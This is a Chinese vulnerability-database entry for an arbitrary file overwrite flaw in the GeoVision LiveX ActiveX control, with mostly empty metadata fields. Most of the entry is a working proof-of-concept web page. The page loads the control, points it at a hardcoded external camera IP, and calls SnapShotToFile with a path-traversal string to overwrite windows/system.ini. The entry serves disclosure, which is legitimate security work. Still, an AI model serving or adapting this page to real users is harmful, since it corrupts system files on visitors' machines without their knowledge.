GeoVision LiveX ActiveX控件SnapShotToFile()方式任意文件覆盖漏洞

基本字段

漏洞编号：: SSV-4795

披露/发现时间：: 未知

提交时间：: 2009-02-19

漏洞等级：

漏洞类别：: 越权访问

影响组件：: GeoVision
(8200,8120,7000)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 0 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0KB

<html> <head> <script language="JavaScript"> function sleep(n) { var now = new Date(); var exitTime = now.getTime() + (n*1000); while (true) { now = new Date(); if (now.getTime() > exitTime) return; } } </script> </head> <body> <object classid="clsid:8D58D690-6B71-4ee8-85AD-006DB0287BF1" id="WebCamX1" width="360" height="300"> <param name="IpAddress" value="http://24.248.47.203" ref>  <param name="DisablePWD" value="-1"> <param name="UserName" value="wec"> <param name="Password" value=""> <param name="CommandPort" value="4550"> <param name="DataPort" value="5550"> <param name="AudioDataPort" value="6550"> <param name="BandWidth" value="LAN"> <param name="FixSize" value="0"> <param name="FixWidth" value="320"> <param name="FixHeight" value="240"> <param name="SvrType" value="0"> <param name="AutoLogin" value="0"> <param name="DefaultCam" value="1"> <param name="AutoReConnect" value="-1"> <param name="MaxRetries" value="-1"> <param name="RetryInterval" value="70"> </object> <script language="JavaScript"> sleep(2); //WebCamX1.SetCntDeviceType(0); //WebCamX1.EnableAutoScreenSize(1); //WebCamX1.SetInfo(125,1,0,"",""); //WebCamX1.SetInfo(129,1,0,"",""); //WebCamX1.SetUpdateInfo(100, "WebCam", 0, "", 8200, 0,0); //WebCamX1.DefaultCam = 1; WebCamX1.PlayX(); sleep(2); WebCamX1.SnapShotToFile("../../../../../../../../../../../windows/system.ini"); WebCamX1.SnapShotX(); </script> </body> </html>